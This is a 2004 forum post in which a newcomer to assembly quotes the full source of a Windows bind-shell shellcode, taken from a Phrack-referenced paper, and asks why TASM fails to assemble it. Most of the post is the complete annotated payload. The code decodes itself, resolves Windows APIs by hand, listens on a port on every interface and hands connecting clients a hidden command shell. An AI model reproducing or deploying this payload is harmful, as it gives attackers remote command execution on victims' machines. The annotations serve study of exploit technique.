November 9th, 2004, 09:39 AM
exploits and asm :getting started.
Phrack 62's article on advances in Windows overflows, http://phrack.org/show.php?p=62&a=7,
is great: it covers some really advanced topics, gives you examples of how to proceed, and the source code is available at http://www.scan-associates.net/papers/one-way.zip
I am new to asm and never enjoyed it, to be honest, but the one-way.zip file contains asm source code for shellcodes. Here is one of those source files:
----------------------------------------------------------
;bind to port shellcode
;port at 0x134
;sk scan-associates net
;
; Analyst notes (added on review): hand-assembled Win32 bind-shell payload,
; TASM syntax, flat model. Phases:
;   (1) call/pop to find its own address,
;   (2) single-byte XOR decoder over the 399 bytes that follow,
;   (3) locate the kernel32 image base by scanning memory downward from a
;       fixed address (fragile across OS versions, see the author's warning),
;   (4) walk the PE export table by hand to resolve GetProcAddress,
;   (5) resolve the remaining APIs by name, storing the addresses over the
;       string table itself,
;   (6) WSASocketA / bind / listen / accept on a hard-coded port,
;   (7) CreateProcessA "cmd" with all three std handles set to the socket.
; Every constant below (add eax,1bh; mov cx,399; the [edi-N] slots) depends
; on the exact byte layout, so the instruction order must not change.
; Register roles after decode: edx = string table, later GetProcAddress;
; ebx = module base (kernel32, then ws2_32), later the socket handle;
; esi = current string; edi = next address slot; ebp = scratch buffer.
.386p
locals
.model flat, stdcall
.code
start:
db 0ebh,02 ;jmp $+2
db 0ebh, 05h ;jmp $+5
db 0e8h, 0f9h,0ffh,0ffh,0ffh ;call $-7 : pushes the address of the 'pop eax' below (call/pop GetPC trick)
pop eax ;eax = address of this instruction
add eax, 1bh ;+27 bytes: by encoding size this should land on 'call here', the first decoded byte
lea esp,[eax-3ffh] ;move the stack ~1 KB below the payload so pushes cannot overwrite it
and esp, 0fffffffch ;4-byte align esp
mov ebp,esp ;ebp = scratch area, reused as sockaddr_in and later as STARTUPINFO
xor ecx,ecx
mov cx,399 ;size of the region to decode (from 'call here' to the end of the payload)
decode:
xor byte ptr [eax], 0 ;key 0 is an identity; presumably patched by an encoder not shown on this page - unverified
inc eax
loop decode
call here ;pushes the address of the string table below; popped into edx at 'here'
db "GetProcAddress",0,"LoadLibraryA",0
db "CreateProcessA",0,"ExitProcess",0
db "ws2_32",0,"WSASocketA",0
db "bind",0,"listen",0,"accept",0
db "cmd",0
;Warning! This will not work in Win2k SP4! Check reverse.asm for a better trick to get Kernel32
here:
pop edx ;edx = start of the string table
push edx ;saved; restored into esi once GetProcAddress has been found
mov ebx,77F00000h ;assumed upper bound of the kernel32 mapping; OS-version dependent (see warning above)
l1:
cmp dword ptr [ebx],905A4Dh ;/x90ZM : low three bytes "MZ",90h - looks for a DOS header one byte at a time
je l2
;db 74h,03h
dec ebx ;no lower bound: an unmapped page between here and kernel32 would fault
jmp l1
l2:
mov esi,dword ptr [ebx+3Ch] ;e_lfanew
add esi,ebx ;esi = PE header
mov esi,dword ptr [esi+78h] ;RVA of the export directory (first data directory entry)
add esi,ebx ;esi = IMAGE_EXPORT_DIRECTORY
mov edi,dword ptr [esi+20h] ;AddressOfNames RVA
add edi,ebx
mov ecx,dword ptr [esi+14h] ;NumberOfNames
push esi ;keep the export directory pointer across the name loop
xor eax,eax ;eax = index of the current name
l4:
push edi
push ecx
mov edi,dword ptr [edi] ;RVA of this exported name
add edi,ebx
mov esi,edx ;esi = "GetProcAddress" (first string of the table)
xor ecx,ecx
;GetProcAddress
mov cl,0Eh ;14 = length of "GetProcAddress"; the terminator is not compared
repe cmps byte ptr [esi],byte ptr [edi]
pop ecx ;pop leaves flags alone, so ZF still reflects the compare
pop edi
je l3
add edi,4 ;next AddressOfNames entry
inc eax
loop l4
jmp ecx ;reached only if no name matched; ecx is 0 here, so this jumps to address 0 - a crash, not a clean failure path
l3:
pop esi ;esi = export directory again
mov edx,dword ptr [esi+24h] ;AddressOfNameOrdinals RVA
add edx,ebx
shl eax,1 ;ordinals are 16-bit
add eax,edx
xor ecx,ecx
mov cx,word ptr [eax] ;cx = ordinal of GetProcAddress
mov eax,dword ptr [esi+1Ch] ;AddressOfFunctions RVA
add eax,ebx
shl ecx,2 ;function RVAs are 32-bit
add eax,ecx
mov edx,dword ptr [eax]
add edx,ebx ;edx = GetProcAddress
pop esi ;esi = string table (pushed at 'here')
mov edi,esi ;resolved addresses are written (stosd) over the start of the table, on top of names already consumed
xor ecx,ecx
;Get 3 Addr
mov cl,3 ;LoadLibraryA, CreateProcessA, ExitProcess -> slots [table+0], [table+4], [table+8]
call loadaddr
add esi,0Ch ;skip "ExitProcess",0 (12 bytes); esi = "ws2_32"
;Load ws2_32
push edx ;keep GetProcAddress across the LoadLibraryA call
push esi
call dword ptr [edi-0Ch] ;LoadLibraryA
pop edx
mov ebx,eax ;ebx = ws2_32 base for the next loadaddr round
xor ecx,ecx
mov cl,4 ;WSASocketA, bind, listen, accept -> slots [table+12] .. [table+24]
call loadaddr
add esi,7 ;skip "accept",0 (7 bytes); esi = "cmd"
xor eax,eax
push eax ;dwFlags = 0 (no WSA_FLAG_OVERLAPPED)
push eax ;g = 0
push eax ;lpProtocolInfo = NULL
push eax ;protocol = 0
inc eax
push eax ;type = 1 (SOCK_STREAM)
inc eax
push eax ;af = 2 (AF_INET)
call dword ptr [edi-16] ;WSASocketA
cmp eax,0FFFFFFFFh ;INVALID_SOCKET
je exit
;bind, listen, accept
mov ebx,eax ;ebx = listening socket
mov word ptr [ebp],2 ;sockaddr_in.sin_family = AF_INET
mov word ptr [ebp+2],5000h ;port, stored as-is so the kernel reads it in network byte order (here 0050h)
mov dword ptr [ebp+4], 0 ;IP = INADDR_ANY (every interface)
push 10h ;sizeof(sockaddr_in)
push ebp
push ebx
call dword ptr [edi-12] ;bind
test eax,eax
jne exit
inc eax ;eax = 1 = backlog
push eax
push ebx
call dword ptr [edi-8] ;listen (soc, 1);
test eax,eax
jne exit ;eax is 0 on success, so the next two pushes pass NULL, NULL
push eax ;addrlen = NULL
push eax ;addr = NULL
push ebx
call dword ptr [edi-4] ;accept - blocks until a client connects
cmp eax,0FFFFFFFFh
je exit
mov ebx,eax ;ebx = connected socket
xor eax,eax
xor ecx,ecx
mov cl,11h ;17 dwords = 68 bytes = sizeof(STARTUPINFOA)
push edi
mov edi,ebp
rep stos dword ptr [edi] ;zero the STARTUPINFO at ebp; leaves ecx = 0 for the pushes below
pop edi
mov byte ptr [ebp],44h ;si.cb = 68
mov dword ptr [ebp+3Ch],ebx ;si.hStdOutput = socket
mov dword ptr [ebp+38h],ebx ;si.hStdInput = socket
mov dword ptr [ebp+40h],ebx ;si.hStdError = socket
mov word ptr [ebp+2Ch],0101h ;si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW; wShowWindow stays 0 (hidden)
lea eax,[ebp+44h] ;PROCESS_INFORMATION placed right after STARTUPINFO
push eax ;lpProcessInformation
push ebp ;lpStartupInfo
push ecx ;lpCurrentDirectory = NULL
push ecx ;lpEnvironment = NULL
push ecx ;dwCreationFlags = 0
inc ecx
push ecx ;bInheritHandles = TRUE (the socket must be inherited by the child)
dec ecx
push ecx ;lpThreadAttributes = NULL
push ecx ;lpProcessAttributes = NULL
push esi ;lpCommandLine = "cmd"
push ecx ;lpApplicationName = NULL
call dword ptr [edi-24] ;CreateProcess
exit:
push eax ;exit code = whatever the last call returned
call dword ptr [edi-20] ;ExitProcess
;-----------------------------------------------------------------------
; loadaddr: resolve ecx exported names in a row.
; In:  esi = current string (its remainder is skipped first), edx = GetProcAddress,
;      ebx = module base, edi = next output slot, ecx = count
; Out: [edi] .. [edi+4*count-4] = addresses, edi advanced past them,
;      esi = start of the last name looked up
; Each round advances esi past the terminator of the string it points at,
; calls GetProcAddress(ebx, esi) on the string that follows and stores the
; result with stosd. Clobbers eax and flags.
;-----------------------------------------------------------------------
loadaddr:
mov al,byte ptr [esi]
inc esi
test al,al
jne loadaddr ;advance esi past the current string's terminator
push ecx
push edx
push esi ;lpProcName = the string that follows
push ebx ;hModule
call edx ;GetProcAddress (stdcall: the callee pops its two arguments)
pop edx
pop ecx
stosd ;[edi] = address; edi += 4
loop loadaddr ;re-entering at loadaddr skips the name just resolved
ret
end start
.data
----------------------------------------------------------
It is supposed to be assembled with TASM. I have Windows 98 and XP; I installed TASM on 98 and tried all of these source files, attempting to create an .obj file, but it doesn't work. Can anyone suggest why?
Maybe it will work fine on Linux, but what if I want to convert this to Windows or DOS format?